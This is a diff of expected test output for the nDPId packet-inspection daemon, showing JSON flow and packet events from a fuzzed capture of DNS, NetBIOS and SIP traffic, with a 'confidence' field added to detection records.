+00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1120470117343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470117343,"pkt":"ADBUADRWAOBJAW69CABFAABIapoAAIARTLcOqAECwKgBAQrCADUANKwzfc8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1120470121594,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470121594,"pkt":"ADBUADRWAODtAW69CABFAABIapsAAIARTLbAqAECwKgBAQrCADUANKwzfc8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470113337,"flow_last_seen":1120470121594,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470113337,"flow_last_seen":1120470121594,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469940218,"flow_last_seen":1120469948230,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00595{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470032178,"flow_last_seen":1120470041184,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470129591,"flow_last_seen":1120470129591,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1120470129591,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470129591,"pkt":"ADBUADRWAODtAW69CABFAABEapwAAIARTLnAqAECwKgBAQrDADUAMM8LVfAAAAABAAAAAAAAATEBMN0wAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470129591,"flow_last_seen":1120470129591,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470129591,"flow_last_seen":1120470129591,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1120470129593,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470129593,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CsMAR7GHVfCAAAABACVzAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470129593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":37,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470129593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":37,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470049190,"flow_last_seen":1120470058198,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470141614,"flow_last_seen":1120470141614,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1120470141614,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470141614,"pkt":"ADBUADRWAODtAW69CABFAABIaqIAAIARTK\/AqAECwKgBAQrEADUANAAlcwABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrACVzAAE="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470141614,"flow_last_seen":1120470141614,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470141614,"flow_last_seen":1120470141614,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1120470142609,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470142609,"pkt":"ADBVADRWAODtAW69CABFAABIaqMAAIARTK7AqAECwKgBAQrEADUANAARKfABVwABAAAAAAAABF\/zaXAEX3VkcANzaXAJY3liZXJjaXSSAmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":283,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470141614,"flow_last_seen":1120470142609,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470142609,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_?ip._udp.sip.cybercit?.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":283,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470141614,"flow_last_seen":1120470142609,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470142609,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_?ip._udp.sip.cybercit?.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1120470144612,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470144612,"pkt":"ADBUADRWAODtAW69CABFAABIaqQAAIARTK3AqAECwKgBAQrEADUANAARKfABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
